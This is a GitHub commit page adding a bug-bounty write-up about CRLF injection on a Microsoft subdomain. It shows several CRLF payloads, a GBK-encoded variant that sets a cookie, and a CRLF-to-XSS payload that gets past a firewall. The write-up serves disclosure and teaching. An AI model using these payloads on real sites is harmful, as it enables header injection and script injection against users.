STRLCPY/NafisiAslH-KnowledgeSharing

Create 20230324 - 6000 with Microsoft Hall of Fame.md
Hossein NafisiAsl committed with GitHub 1 year ago

9a91a891

1 parent f0773e96

Total 1 files

■ ■ ■ ■ ■ ■

CyberSecurity/Web/BountyStory/CRLF/20230324 - 6000 with Microsoft Hall of Fame.md

1	+	# $6000 with Microsoft Hall of Fame ⚔️
2	+
3	+	1. Let’s test for the most ignored vulnerability CRLF INJECTION
4	+	<br>
5	+
6	+	2. I tried with some different payloads, but I was only getting “400 Bad Request”
7	+	```
8	+	%0D%0A%20Set-Cookie:whoami=thecyberneh
9	+	%20%0D%0ASet-Cookie:whoami=thecyberneh
10	+	%0A%20Set-Cookie:whoami=thecyberneh
11	+	%2F%2E%2E%0D%0ASet-Cookie:whoami=thecyberneh
12	+	```
13	+
14	+
15	+	3. I did little research and got some unique encoding called “GBK encoding”. so after URL encoding, I crafted and tried a new payload like this:
16	+	```
17	+	https://subDomain.microsoft.com/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=thecyberneh
18	+	```
19	+	And Boom!!!<br>
20	+	![20230324-1.png](../images/20230324-1.png)
21	+	<br>
22	+
23	+	4. CRLF TO XSS with Firewall Bypass
24	+	```
25	+	ENCODING
26	+	“<” --> 嘼 --> %E5%98%BC
27	+	“>” --> 嘾 --> %E5%98%BE
28	+	https://subDomain.microsoft.com/%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
29	+	```
30	+	![20230324-2.png](../images/20230324-2.png)
31	+
32	+
33	+	## Credit
34	+	Based on [Neh Patel](https://infosecwriteups.com/6000-with-microsoft-hall-of-fame-microsoft-firewall-bypass-crlf-to-xss-microsoft-bug-bounty-8f6615c47922)'s writeup.
35	+	<br>
36	+
37	+	## Support
38	+	You can Follow [me](https://twitter.com/MeAsHacker_HNA) on twitter or
39	+	<br><br><a href="https://www.buymeacoffee.com/NafisiAslH" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png" alt="Buy Me A Coffee" style="height: 60px !important;width: 217px !important;" ></a>
40	+

Create 20230324 - 6000 with Microsoft Hall of Fame.md